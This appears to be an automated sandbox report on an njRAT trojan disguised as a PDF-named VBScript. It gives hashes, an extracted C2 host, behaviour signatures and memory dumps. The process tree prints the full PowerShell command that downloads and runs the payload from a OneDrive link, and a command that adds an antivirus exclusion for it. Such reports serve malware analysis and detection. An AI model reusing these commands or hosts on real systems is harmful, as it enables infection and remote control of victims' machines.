njrat | c34173dfa5a1a842bb14ef1fddd8f15b0998577740469b6987d138e165786994

General

Target

Documentacion.PDF.vbs
Size

162KB
MD5

16dd6afc5e63f4edc4f35fd1176e63bd
SHA1

d64a9461b703119695e76f880832924d487a648a
SHA256

c34173dfa5a1a842bb14ef1fddd8f15b0998577740469b6987d138e165786994
SHA512

3e2abe804b90ec51e1a7fb4145a0b11304e3d279c13cc3f65380721c079fb1b9711bb491e92b5e95c6ca957aeb7bfed9b33b030c094a1dcc3d4ebcab577b8df3

Score

10^/10

njrat nyan cat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://onedrive.live.com/download?cid=4DBCDBEA8A120146&resid=4DBCDBEA8A120146%21152&authkey=AP1AB-SxiNqVg04

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

pedrobedoya2021.duckdns.org:1980

Mutex

cf13c225ff474d45b

Attributes

reg_key
cf13c225ff474d45b
splitter
@!#&^%$

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

4 996 powershell.exe
6 996 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

Hostdyn.exeHostdyn.exe

pid process

2584 Hostdyn.exe
1284 Hostdyn.exe

flow	pid	process
4	996	powershell.exe
6	996	powershell.exe

pid	process
2584	Hostdyn.exe
1284	Hostdyn.exe

Drops startup file 2 IoCs

Processes:

WScript.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Documentacion.PDF.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Documentacion.PDF.vbs	WScript.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

Hostdyn.exe

description pid process target process

PID 2584 set thread context of 1284 2584 Hostdyn.exe Hostdyn.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

996 powershell.exe
996 powershell.exe
996 powershell.exe
1340 powershell.exe
1340 powershell.exe
1340 powershell.exe

description	pid	process	target process
PID 2584 set thread context of 1284	2584	Hostdyn.exe	Hostdyn.exe

pid	process
996	powershell.exe
996	powershell.exe
996	powershell.exe
1340	powershell.exe
1340	powershell.exe
1340	powershell.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

Processes:

powershell.exepowershell.exeHostdyn.exe

description	pid	process
Token: SeDebugPrivilege	996	powershell.exe
Token: SeDebugPrivilege	1340	powershell.exe
Token: SeDebugPrivilege	1284	Hostdyn.exe
Token: 33	1284	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1284	Hostdyn.exe
Token: 33	1284	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1284	Hostdyn.exe
Token: 33	1284	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1284	Hostdyn.exe
Token: 33	1284	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1284	Hostdyn.exe
Token: 33	1284	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1284	Hostdyn.exe
Token: 33	1284	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1284	Hostdyn.exe
Token: 33	1284	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1284	Hostdyn.exe
Token: 33	1284	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1284	Hostdyn.exe
Token: 33	1284	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1284	Hostdyn.exe
Token: 33	1284	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1284	Hostdyn.exe
Token: 33	1284	Hostdyn.exe
Token: SeIncBasePriorityPrivilege	1284	Hostdyn.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

WScript.exepowershell.exeHostdyn.exe

description	pid	process	target process
PID 652 wrote to memory of 996	652	WScript.exe	powershell.exe
PID 652 wrote to memory of 996	652	WScript.exe	powershell.exe
PID 996 wrote to memory of 2584	996	powershell.exe	Hostdyn.exe
PID 996 wrote to memory of 2584	996	powershell.exe	Hostdyn.exe
PID 996 wrote to memory of 2584	996	powershell.exe	Hostdyn.exe
PID 2584 wrote to memory of 1340	2584	Hostdyn.exe	powershell.exe
PID 2584 wrote to memory of 1340	2584	Hostdyn.exe	powershell.exe
PID 2584 wrote to memory of 1340	2584	Hostdyn.exe	powershell.exe
PID 2584 wrote to memory of 1284	2584	Hostdyn.exe	Hostdyn.exe
PID 2584 wrote to memory of 1284	2584	Hostdyn.exe	Hostdyn.exe
PID 2584 wrote to memory of 1284	2584	Hostdyn.exe	Hostdyn.exe
PID 2584 wrote to memory of 1284	2584	Hostdyn.exe	Hostdyn.exe
PID 2584 wrote to memory of 1284	2584	Hostdyn.exe	Hostdyn.exe
PID 2584 wrote to memory of 1284	2584	Hostdyn.exe	Hostdyn.exe
PID 2584 wrote to memory of 1284	2584	Hostdyn.exe	Hostdyn.exe
PID 2584 wrote to memory of 1284	2584	Hostdyn.exe	Hostdyn.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Documentacion.PDF.vbs"
1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -noprofile -windowstyle hidden -command "Set-Content -value (new-object System.net.webclient).downloaddata( 'https://onedrive.live.com/download?cid=4DBCDBEA8A120146&resid=4DBCDBEA8A120146%21152&authkey=AP1AB-SxiNqVg04' ) -encoding byte -Path $env:appdata\Hostdyn.exe; Start-Process $env:appdata\Hostdyn.exe"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:996

C:\Users\Admin\AppData\Roaming\Hostdyn.exe
"C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1340

C:\Users\Admin\AppData\Roaming\Hostdyn.exe
"C:\Users\Admin\AppData\Roaming\Hostdyn.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1284

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
62057db60a4732c124fd1ad85b787094

SHA1
fd0ebcb0f469f20acf64082127d0d54c271317ca

SHA256
067c30fd77c4ee6f0255ed244b24359341c308ecbb4f961e982ce80355562559

SHA512
9261b5c4cbfbd7e4cfb1a565d7e3380ffa0a297bb5ee1a24701348432ab9d68922a829adc85f8bb80b641172d0f6ca18cf96c1e9f8c5a63437c67017b404e52e

Download Submit
C:\Users\Admin\AppData\Roaming\Hostdyn.exe
MD5
857aff9992a47764185c61da2493c753

SHA1
6efa34cd3fdb299fcd940c0719d3a172bac83164

SHA256
b73dc9d5947dd389cbae282955568d35ae3a38acd24983b116cdd8eb7ef67155

SHA512
fbb2a5bfb068d4f56e338dc67f4d1a171af3156de2b3d956a0a1bd9526706f370cdff16cfb136049468b3a71db4c7ce99349265d3841db7775d5389b7aab798a

Download Submit
C:\Users\Admin\AppData\Roaming\Hostdyn.exe
MD5
857aff9992a47764185c61da2493c753

SHA1
6efa34cd3fdb299fcd940c0719d3a172bac83164

SHA256
b73dc9d5947dd389cbae282955568d35ae3a38acd24983b116cdd8eb7ef67155

SHA512
fbb2a5bfb068d4f56e338dc67f4d1a171af3156de2b3d956a0a1bd9526706f370cdff16cfb136049468b3a71db4c7ce99349265d3841db7775d5389b7aab798a

Download Submit
C:\Users\Admin\AppData\Roaming\Hostdyn.exe
MD5
857aff9992a47764185c61da2493c753

SHA1
6efa34cd3fdb299fcd940c0719d3a172bac83164

SHA256
b73dc9d5947dd389cbae282955568d35ae3a38acd24983b116cdd8eb7ef67155

SHA512
fbb2a5bfb068d4f56e338dc67f4d1a171af3156de2b3d956a0a1bd9526706f370cdff16cfb136049468b3a71db4c7ce99349265d3841db7775d5389b7aab798a

Download Submit
memory/996-114-0x0000000000000000-mapping.dmp

Download
memory/996-120-0x00000253C2AF0000-0x00000253C2AF1000-memory.dmp

Filesize
4KB

Download
memory/996-126-0x00000253DAFC0000-0x00000253DAFC2000-memory.dmp

Filesize
8KB

Download
memory/996-128-0x00000253DAFC3000-0x00000253DAFC5000-memory.dmp

Filesize
8KB

Download
memory/996-129-0x00000253DD1A0000-0x00000253DD1A1000-memory.dmp

Filesize
4KB

Download
memory/996-134-0x00000253DAFC6000-0x00000253DAFC8000-memory.dmp

Filesize
8KB

Download
memory/1284-167-0x000000000040677E-mapping.dmp

Download
memory/1284-166-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1284-279-0x0000000005650000-0x0000000005B4E000-memory.dmp

Filesize
5.0MB

Download
memory/1340-180-0x0000000007580000-0x0000000007581000-memory.dmp

Filesize
4KB

Download
memory/1340-175-0x00000000067A0000-0x00000000067A1000-memory.dmp

Filesize
4KB

Download
memory/1340-181-0x00000000077D0000-0x00000000077D1000-memory.dmp

Filesize
4KB

Download
memory/1340-405-0x0000000006AC0000-0x0000000006AC1000-memory.dmp

Filesize
4KB

Download
memory/1340-209-0x0000000006873000-0x0000000006874000-memory.dmp

Filesize
4KB

Download
memory/1340-165-0x0000000000000000-mapping.dmp

Download
memory/1340-208-0x000000007EF80000-0x000000007EF81000-memory.dmp

Filesize
4KB

Download
memory/1340-207-0x00000000091F0000-0x00000000091F1000-memory.dmp

Filesize
4KB

Download
memory/1340-206-0x0000000009030000-0x0000000009031000-memory.dmp

Filesize
4KB

Download
memory/1340-186-0x0000000007F40000-0x0000000007F41000-memory.dmp

Filesize
4KB

Download
memory/1340-176-0x0000000006EB0000-0x0000000006EB1000-memory.dmp

Filesize
4KB

Download
memory/1340-178-0x0000000006872000-0x0000000006873000-memory.dmp

Filesize
4KB

Download
memory/1340-177-0x0000000006870000-0x0000000006871000-memory.dmp

Filesize
4KB

Download
memory/1340-179-0x00000000074E0000-0x00000000074E1000-memory.dmp

Filesize
4KB

Download
memory/1340-412-0x0000000006AB0000-0x0000000006AB1000-memory.dmp

Filesize
4KB

Download
memory/1340-201-0x0000000008EC0000-0x0000000008EC1000-memory.dmp

Filesize
4KB

Download
memory/1340-182-0x0000000007840000-0x0000000007841000-memory.dmp

Filesize
4KB

Download
memory/1340-194-0x0000000008EE0000-0x0000000008F13000-memory.dmp

Filesize
204KB

Download
memory/1340-184-0x00000000076B0000-0x00000000076B1000-memory.dmp

Filesize
4KB

Download
memory/1340-185-0x0000000008160000-0x0000000008161000-memory.dmp

Filesize
4KB

Download
memory/2584-155-0x0000000000F70000-0x0000000000F71000-memory.dmp

Filesize
4KB

Download
memory/2584-151-0x0000000000000000-mapping.dmp

Download
memory/2584-162-0x0000000008E80000-0x0000000008E81000-memory.dmp

Filesize
4KB

Download
memory/2584-161-0x0000000005E70000-0x0000000005E77000-memory.dmp

Filesize
28KB

Download
memory/2584-157-0x0000000005F10000-0x0000000005F11000-memory.dmp

Filesize
4KB

Download
memory/2584-160-0x0000000005AD0000-0x0000000005AD1000-memory.dmp

Filesize
4KB

Download
memory/2584-164-0x0000000007730000-0x000000000774F000-memory.dmp

Filesize
124KB

Download
memory/2584-159-0x0000000005A10000-0x0000000005F0E000-memory.dmp

Filesize
5.0MB

Download
memory/2584-163-0x0000000007690000-0x00000000076E4000-memory.dmp

Filesize
336KB

Download
memory/2584-158-0x0000000005940000-0x0000000005941000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads